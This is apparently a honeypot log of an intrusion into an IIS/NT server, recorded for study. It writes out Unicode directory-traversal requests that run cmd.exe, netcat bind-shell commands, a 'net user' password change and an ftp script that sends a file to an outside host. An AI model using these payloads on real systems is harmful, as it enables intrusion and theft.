03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 24 File(s) 48,075 bytes 1,690,254,336 bytes free C:\InetPub\wwwroot> >>> har.txt is still there... 14:15:48 cd guest C:\InetPub\wwwroot\guest> dir Volume in drive C has no label. 
Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot\guest 12/15/00 09:15p . 12/15/00 09:15p .. 12/15/00 08:59p 1 12/15/00 09:09p 2 12/15/00 08:59p 3 01/05/01 11:27a 1,829 default.asp 05/07/99 09:14p 200,704 DVMailer.DLL 12/15/00 09:11p 10,017 guestbook.asp 06/15/99 12:17p 18 GuestBook.bot 01/25/01 04:12p 27,843 GuestBook.HTM 01/25/01 04:12p 2,691 GUESTBOOK.LOG 12/15/00 09:22p 413 GuestBook.top 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 06/16/99 10:45a 4,441 Readme 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 06/16/99 08:50a 186 ViewGB.asp 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 25 File(s) 276,406 bytes 1,690,254,336 bytes free C:\InetPub\wwwroot\guest> cd .. C:\InetPub\wwwroot> ...a lot of keyboard trouble... 14:16:16 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 07:14a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 15 File(s) 78,648,918 bytes 1,690,254,336 bytes free C:\> cd temp dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\TEMP 12/21/00 08:59p . 12/21/00 08:59p .. 
12/16/00 06:54p 81,920 Arm2.tmp 12/16/00 06:54p 16 E65B8AC0.TMP 12/21/00 08:59p IXP1.tmp 12/20/00 05:12p 7,680 ~DF64D5.tmp 6 File(s) 89,616 bytes 1,690,254,336 bytes free C:\TEMP> 14:17:38 UNICODE GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6968+-e+cmd1.exe HTTP/1.1 new shell bound to port 6968 - already in use?! 14:19:05 UNICODE GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6868+-e+cmd1.exe HTTP/1.1 new shell bound to port 6868 15:20:44.243335 connect from 202.85.60.156 (ip60-156.hksp.net) Hong Kong dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Common Files\System 12/07/00 03:23p . 12/07/00 03:23p .. 12/07/00 03:34p ado 02/04/01 07:04a msadc 12/07/00 03:34p ole db 11/11/97 12:50p 399,120 wab32.dll 6 File(s) 399,120 bytes 1,690,259,968 bytes free C:\Program Files\Common Files\System> cd .. C:\Program Files\Common Files> cd .. C:\Program Files> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files 12/21/00 08:59p . 12/21/00 08:59p .. 12/07/00 03:11p Common Files 12/21/00 08:59p D4 12/07/00 03:23p ICW-Internet Connection Wizard 12/07/00 03:37p Microsoft FrontPage 12/07/00 03:34p Mts 12/07/00 03:23p Outlook Express 11/26/00 06:42p Plus! 12/16/00 06:54p Syslogd 11/26/00 06:56p Windows NT 11 File(s) 0 bytes 1,690,259,968 bytes free C:\Program Files> cd Outlook Express C:\Program Files\Outlook Express> Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\Program Files\Outlook Express 12/07/00 03:23p . 12/07/00 03:23p .. 
11/11/97 10:25a 36,176 msimn.exe 10/30/97 10:19p 14,182 msimn.txt 11/11/97 10:25a 97,424 msimnimp.dll 11/11/97 12:50p 1,689,872 msimnui.dll 11/11/97 10:25a 26,144 wab.exe 11/11/97 10:25a 12,464 wabfind.dll 11/11/97 10:25a 106,752 wabimp.dll 11/11/97 10:25a 40,224 wabmig.exe 11/11/97 10:25a 48,624 _isetup.exe 11 File(s) 2,071,862 bytes 1,690,259,968 bytes free C:\Program Files\Outlook Express> cd ../../ C:\Program Files> cd .. C:\> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 07:14a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 15 File(s) 78,648,918 bytes 1,690,259,968 bytes free C:\> type yay.txt C:\> mkdir test C:\> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:14a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 16 File(s) 78,648,918 bytes 1,690,259,968 bytes free C:\> type har.txt MSCF $$hive$$.tmp ..... cd exploits C:\exploits> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits 12/26/00 07:36p . 12/26/00 07:36p .. 
12/26/00 07:36p microsoft 12/26/00 07:35p newfiles 12/26/00 07:24p unix 5 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits> cd unix C:\exploits\unix> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix 12/26/00 07:24p . 12/26/00 07:24p .. 12/26/00 07:25p sunos-exploits 12/26/00 07:24p tcp-exploits 12/26/00 07:24p trojans 12/26/00 07:16p udp-exploits 12/26/00 07:15p ultrix-exploits 12/26/00 07:15p xwin-exploits 8 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits\unix> cd sunos C:\exploits\unix\sunos-exploits> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix\sunos-exploits 12/26/00 07:25p . 12/26/00 07:25p .. 03/23/98 10:25a 3,209 binmail.sh 03/23/98 10:25a 4,343 chup.c 03/23/98 10:25a 964 kcms.sh 03/23/98 10:25a 1,522 lastlog.c 03/23/98 10:25a 4,988 nittie.c 03/23/98 10:25a 4,622 passwdscript.sh 8 File(s) 19,648 bytes 1,690,259,968 bytes free C:\exploits\unix\sunos-exploits> cd .. C:\exploits\unix> cd .. C:\exploits> 14:25:03 echo best honeypot i've seen till now :) > rfp.txt Volume in drive C has no label. 
Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:15a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 17 File(s) 78,648,956 bytes 1,690,259,968 bytes free C:\> 14:25:49 session #1 UNICODE GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1 [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows NT Server, Enterprise Edition Version 4.00" multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows NT Server, Enterprise Edition Version 4.00 [VGA mode]" /basevideo /sos 14:25:51 session #2 cd exploits C:\exploits> session #1 GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../READ.NOW.hax0r HTTP/1.1 server responds with 404 session #2 cd wiretrip C:\wiretrip> session #1 GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../READ.me.NOW.hax0r HTTP/1.1 server responds 404 session #2 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\wiretrip 12/26/00 07:09p . 12/26/00 07:09p .. 12/26/00 07:04p 15,501 msadc1.pl 12/26/00 07:04p 17,865 msadc2.pl 12/26/00 07:04p 4,425 RFParalyze.c 12/26/00 07:04p 2,269 RFPickaxe.pl 12/26/00 07:05p 7,393 RFPoison.c 12/26/00 07:04p 12,450 RFPoison.zip 12/26/00 07:04p 1,792 RFProwl.c 12/26/00 07:06p 170,372 whisker.tar.gz 12/26/00 07:06p 173,427 whisker.zip 12/26/00 07:05p 25,229 whiskerids.html 12 File(s) 430,723 bytes 1,690,259,968 bytes free C:\wiretrip> cd .. C:\> dir Volume in drive C has no label. 
Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:15a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 17 File(s) 78,648,956 bytes 1,690,259,968 bytes free C:\> cd exploits C:\exploits> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits 12/26/00 07:36p . 12/26/00 07:36p .. 12/26/00 07:36p microsoft 12/26/00 07:35p newfiles 12/26/00 07:24p unix 5 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits> cd newfiles C:\exploits\newfiles> Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\newfiles 12/26/00 07:35p . 12/26/00 07:35p .. 2 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits\newfiles> cd ../unix C:\exploits> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix 12/26/00 07:24p . 12/26/00 07:24p .. 12/26/00 07:25p sunos-exploits 12/26/00 07:24p tcp-exploits 12/26/00 07:24p trojans 12/26/00 07:16p udp-exploits 12/26/00 07:15p ultrix-exploits 12/26/00 07:15p xwin-exploits 8 File(s) 0 bytes 1,690,259,968 bytes free C:\exploits\unix> cd tcp-exploits C:\exploits\unix\tcp-exploits> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\exploits\unix\tcp-exploits 12/26/00 07:24p . 12/26/00 07:24p .. 
03/23/98 10:26a 1,330 ALLHOSTS.C 03/23/98 10:26a 7,436 bounce.c 03/23/98 10:26a 4,841 CSIRCSEQ.C 03/23/98 10:26a 4,465 datapipe.c 03/23/98 10:26a 3,782 KILL-ME.C 03/23/98 10:26a 8,548 NNTPFORG.C 03/23/98 10:26a 9,372 SZ-SEQ.C 03/23/98 10:26a 5,924 TSPOOF.C 10 File(s) 45,698 bytes 1,690,259,968 bytes free C:\exploits\unix\tcp-exploits> type ALLHOSTS.C ............ C:\exploits\unix\tcp-exploits> dir again type CSIRCSEQ.C ............ C:\exploits\unix\tcp-exploits> cd .. C:\exploits\unix> cd .. C:\exploits> cd .. C:\> dir again type README.NOW.Hax0r Hi, i know that this a is a lab server, but patch the holes! :-) C:\> cd Program Files C:\Program Files> dir again cd Program Files C:\Program Files> dir again cd .. C:\> cd Inetpub C:\InetPub> dir again cd wwwroot C:\InetPub\wwwroot> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:15a . 02/04/01 07:15a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 23 File(s) 42,748 bytes 1,690,259,968 bytes free C:\InetPub\wwwroot> 14:33:37 session #1 RDS net user IWAM_KENNY Snake69Snake69 14:34:20 session #2 echo test > test.txt C:\InetPub\wwwroot> 15:34:26.673973 requested by 212.187.36.4 (arnink00.chello.nl) a proxy, which according to the request header forwarded the request for 213.46.45.28 (d45028.upc-d.chello.nl) 15:35:13.234041 session #1 213.116.251.162 sends 4 icmp: 
echo request NO ECHO REPLY?! 14:35:26 session #2 echo this can't be true > test.txt C:\InetPub\wwwroot> type test.txt this can't be true C:\InetPub\wwwroot> 14:36:02 session #1 requests test.txt via http 15:37:22.484792 213.46.45.28 requests test.txt via http (direct request, no proxy) 15:38:11.166927 213.48.120.242 (cache-haw-e3a.cableinet.net) requests test.txt for 194.117.146.52 (usr42-haw.cableinet.co.uk) 15:38:20.095797 194.126.101.110 (cache3.estpak.ee) requests test.txt for 213.168.4.30 (adsl3584.estpak.ee) 15:39:12.279693 213.93.39.186 (e39186.upc-e.chello.nl) requests test.txt 15:39:22.599574 24.43.44.7 (cr602951-a.lndn1.on.wave.home.com) requests test.txt 15:39:55.840177 198.142.92.196 (perax6-196.dialup.optusnet.com.au) requests test.txt 15:40:26.971956 session #2 dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:33a . 02/04/01 07:33a .. 12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 02/04/01 07:34a 21 test.txt 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 24 File(s) 42,769 bytes 1,690,259,968 bytes free C:\InetPub\wwwroot> cd .. C:\InetPub> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub 12/07/00 03:30p . 12/07/00 03:30p .. 
11/26/00 12:40p ftproot 11/26/00 12:40p gophroot 12/07/00 03:31p iissamples 11/26/00 12:40p scripts 02/04/01 07:33a wwwroot 7 File(s) 0 bytes 1,690,259,968 bytes free C:\InetPub> cd .. c:\> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:22a test 02/04/01 07:34a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 17 File(s) 78,648,956 bytes 1,690,259,968 bytes free C:\> rmdir test C:\> 15:42:58.763752 62.153.22.63 (p3E99163F.dip.t-dialin.net) requests test.txt 15:44:44.190843 213.245.4.107 (cha213245004107.chello.fr) requests test.txt 15:45:00.501753 session #2 cd inetpub/wwwroot C:\InetPub> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub 12/07/00 03:30p . 12/07/00 03:30p .. 11/26/00 12:40p ftproot 11/26/00 12:40p gophroot 12/07/00 03:31p iissamples 11/26/00 12:40p scripts 02/04/01 07:33a wwwroot 7 File(s) 0 bytes 1,690,259,968 bytes free C:\InetPub> cd wwwroot C:\InetPub\wwwroot> dir Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of C:\InetPub\wwwroot 02/04/01 07:33a . 02/04/01 07:33a .. 
12/07/00 03:37p cgi-bin 12/07/00 03:37p 4,663 default.asp 12/15/00 10:26p 1,233 default.htm 12/07/00 03:37p 4,325 default.htm.org 12/15/00 09:15p guest 12/07/00 03:37p images 12/15/00 06:36p 709 lrfpbot.gif 12/15/00 07:05p 673 lrfptop.gif 12/15/00 06:36p 1,422 nmrc.gif 12/07/00 03:37p 2,504 postinfo.html 12/15/00 06:36p 968 rfp.gif 12/15/00 06:36p 8,606 rfpback.gif 12/15/00 06:36p 8,606 rfpback1.gif 11/26/00 12:40p samples 12/15/00 06:36p 1,624 sf.gif 12/15/00 06:36p 756 technotronic.gif 02/04/01 07:34a 21 test.txt 12/15/00 06:36p 2,526 void.gif 12/15/00 06:36p 1,213 whisker.gif 12/15/00 06:36p 1,161 win2k.gif 12/07/00 03:37p _private 12/07/00 03:37p 1,759 _vti_inf.html 24 File(s) 42,769 bytes 1,690,259,968 bytes free C:\InetPub\wwwroot> copy default.htm default.html 1 file(s) copied. C:\InetPub\wwwroot> echo . >>default.htm C:\InetPub\wwwroot> 15:46:08.307092 212.187.36.4 retrieves default.htm for 213.46.45.28 (d45028.upc-d.chello.nl) the trailing dot is there 15:46:34.767365 62.153.22.63 (p3E99163F.dip.t-dialin.net) retrieves test.txt 15:50:27.493952 session #1 UNICODE GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe copies C:\winnt\system32\cmd.exe The process cannot access the file because it is being used by another process. 0 file(s) copied. 15:50:31.383948 session #2 dir Volume in drive C has no label. 
Volume Serial Number is 8403-6A0E Directory of C:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/26/00 07:36p exploits 02/04/01 07:07a 5,327 har.txt 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/26/00 07:10p New Folder 01/26/01 02:10p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 02/04/01 06:49a 69 README.NOW.Hax0r 02/04/01 07:23a 38 rfp.txt 12/21/00 08:59p TEMP 02/04/01 07:34a WINNT 12/26/00 07:09p wiretrip 02/04/01 06:43a 0 yay.txt 16 File(s) 78,648,956 bytes 1,690,258,432 bytes free C:\> 15:50:37.059000 session #1 UNICODE /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1 builds a new ftp command script named ftpcom, overwriting the old one open 213.116.251.162 johna2k haxedj00 put c:\wiretrip\whisker.tar.gz quit UNICODE ftp -s:ftpcom 220--------H-A-C-K T-H-E P-L-A-N-E-T-------- 220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r. 220-Featuring 100% elite hax0r warez!@$#@ 220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram. 220 -------H-A-C-K T-H-E P-L-A-N-E-T-------- Login ok, sends file 15:51:32.707281 ... 226 Transfer complete. 221 Buh bye, you secksi hax0r j00 :] 15:53:30.042564 UNICODE del ftpcom 15:51:52.815837 session #1 UNICODE binds a new shell to port 6969 15:52:24.859950 204.137.229.4 (nemean.spikeman.net) requests test.txt for an intranet client 15:56:24.300390 64.219.144.66 (ppp-64-219-144-66.dialup.hrlntx.swbell.net) requests test.txt 15:59:18.752777 213.64.51.77 (h77n2fls20o70.telia.com) requests test.txt 16:18:29.598100 193.253.209.220 (ANeuilly-101-1-3-220.abo.wanadoo.fr) requests test.txt